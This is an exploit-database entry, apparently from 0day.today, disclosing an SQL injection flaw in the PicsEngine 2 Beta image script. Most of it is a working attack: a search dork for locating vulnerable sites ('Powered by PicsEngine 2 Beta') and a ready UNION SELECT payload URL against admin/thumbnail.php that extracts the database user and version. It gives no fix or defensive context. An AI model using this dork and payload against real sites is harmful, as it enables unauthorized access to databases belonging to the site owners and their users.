id: 21848
date: 02/02/2014
title: PicsEngine SQL Injection Vulnerability
author: Houssamix
cves: 

-------------------------------------------------------------
	PicsEngine SQL Injection Vulnerability 
-------------------------------------------------------------
  
= Author : Houssamix                       
= Script : PicsEngine (tested on PicsEngine 2 Beta, other versions may be infected) 
                      
= BUG :  SQL Injection Vulnerability 
  
= DORK : "Powered by PicsEngine 2 Beta"
  
= Exploit :                               
http://[target]/admin/thumbnail.php?id=1' union select user(),2,3,version(),5,6,7--'

then show code source for results.
 
= NOTES : 
- Admin privileges required

#  0day.today [2023-03-23]  #